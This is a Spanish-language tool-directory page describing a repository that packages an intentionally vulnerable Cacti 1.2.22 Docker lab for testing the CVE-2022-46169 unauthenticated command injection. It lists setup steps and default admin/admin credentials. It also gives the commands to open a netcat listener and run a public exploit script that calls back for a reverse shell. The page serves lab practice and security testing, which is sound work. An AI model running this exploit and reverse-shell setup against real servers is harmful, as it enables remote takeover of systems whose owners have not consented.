Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlLabs y Práctica
GitHubm3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

cacti-rce-cve-2022-46169-vulnerable-application

ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la inyección de comandos de Cacti (CVE-2022-46169). ¡Úsala bajo tu propio riesgo!

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
12hace 3 añosAún no revisado

Aplicación vulnerable de inyección de comandos en Cacti v1.2.22 (CVE-2022-46169)

Esta es una aplicación vulnerable para probar el exploit de la vulnerabilidad Cacti (CVE-2022-46169).

¡ADVERTENCIA!

Esta aplicación contiene vulnerabilidades de seguridad graves. ¡Úsela bajo su propio riesgo! Se recomienda utilizar un entorno respaldado y aislado (como una VM con una instantánea reciente y red solo anfitrión). No suba esta aplicación a ningún servidor expuesto a Internet, ya que se verá comprometido.

DESCARGO DE RESPONSABILIDAD: No me hago responsable del uso que cualquier persona haga de esta aplicación. El único propósito de esta aplicación es ser un escenario de prueba para el exploit CVE-2022-46169 y no debe utilizarse con fines malintencionados. Si su servidor se ve comprometido mediante una instalación de esta aplicación, no es mi responsabilidad, sino de la(s) persona(s) que la subieron e instalaron.

Información de la vulnerabilidad

  • ID de CVE: CVE-2022-46169
  • Enlace: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • Descripción: En las versiones afectadas, una vulnerabilidad de inyección de comandos permite que un usuario no autenticado ejecute código arbitrario en un servidor que ejecute Cacti, si se seleccionó una fuente de datos específica para cualquier dispositivo monitorizado.

Uso

Estos son los pasos para configurar el entorno:

  1. Ejecute docker compose up -d para iniciar la composición.
  2. Puede finalizar los pasos navegando a http://127.0.0.1/cacti para iniciar el asistente de inicialización de Cacti. Si recibe un error relacionado con la base de datos, espere un poco y actualice la página.
  3. Las credenciales predeterminadas son admin/admin.
  4. Presione "Siguiente" en todos los botones durante el asistente, eligiendo las opciones correspondientes. Todos los valores predeterminados deberían ser correctos y todos los requisitos obligatorios deberían estar satisfechos.
  5. Después de la instalación, debe configurar un nuevo gráfico:
    1. Haga clic en "Crear gráficos".
    2. En la sección "Plantillas de gráficos", en el menú desplegable cercano a "Crear", seleccione: "Dispositivo - Tiempo de actividad".
    3. Presione el botón "Crear".

El contenedor se llamará vuln-cacti.

Para eliminar el entorno, use el comando docker compose down.

La guía de instalación oficial de Cacti se puede encontrar aquí.

Causa raíz

Una causa raíz detallada de la vulnerabilidad está disponible aquí.

Exploit

Un exploit público está disponible en Exploit-DB. Se ha copiado en la carpeta exploit/ para mayor simplicidad.

Para ejecutarlo:

  1. Use netcat en la máquina anfitriona para escuchar conexiones entrantes.
    root@kitploit:~
    nc -lvp 6669
    
  2. Ejecute el exploit.
    root@kitploit:~
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    
    Consejo: host.docker.internal se usa para alcanzar la máquina anfitriona desde el contenedor (referencia).

También hay una entrada en el repositorio vulhub.

Autores

  • Antonio Francesco Sardella - implementación - m3ssap0

Licencia

Este proyecto está licenciado bajo la Unlicense; consulte el archivo LICENSE para obtener más detalles.

Agradecimientos

  • Stefan Schiller, el investigador de seguridad que descubrió la vulnerabilidad.
  • Riadh Bouchahoua, el desarrollador del exploit.
Descargar herramienta